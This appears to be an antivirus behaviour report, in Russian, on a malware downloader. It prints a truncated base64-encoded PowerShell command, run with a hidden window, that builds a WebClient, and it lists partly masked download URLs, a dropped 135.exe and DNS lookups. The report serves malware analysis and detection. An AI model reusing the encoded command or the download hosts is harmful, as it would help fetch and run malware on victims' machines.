Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYADAAXwA3ADIAXwBfAD0AKAAnAHcAMgAnACsAJwBfAF8AXwBfACcAKwAnADAAXwAnACkAOwAkAFMAMgAyADMAOQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQATgA1AF8ANABfADEAXwA9AC...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\135.exe
Удаляет следующие файлы
- %HOMEPATH%\135.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://if#c.ru/eKKi6q5YUC_WyPjVNX
- http://www.if#c.ru/eKKi6q5YUC_WyPjVNX
- http://ap#####trical.com.au/wp-content/3MdEhYTTHULOUo
- http://ap#####trical.com.au/wp-content/3MdEhYTTHULOUo/
- http://ma##ha.ru/PQt3QofoXj
- http://ma##ha.ru/index.php
- http://ak####troi-dv.ru/sIs2eNw5Woa0_fc
UDP
- DNS ASK if#c.ru
- DNS ASK ap#####trical.com.au
- DNS ASK ma##ha.ru
- DNS ASK ak####troi-dv.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYADAAXwA3ADIAXwBfAD0AKAAnAHcAMgAnACsAJwBfAF8AXwBfACcAKwAnADAAXwAnACkAOwAkAFMAMgAyADMAOQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQATgA1AF8ANABfADEAXwA9AC...' (со скрытым окном)
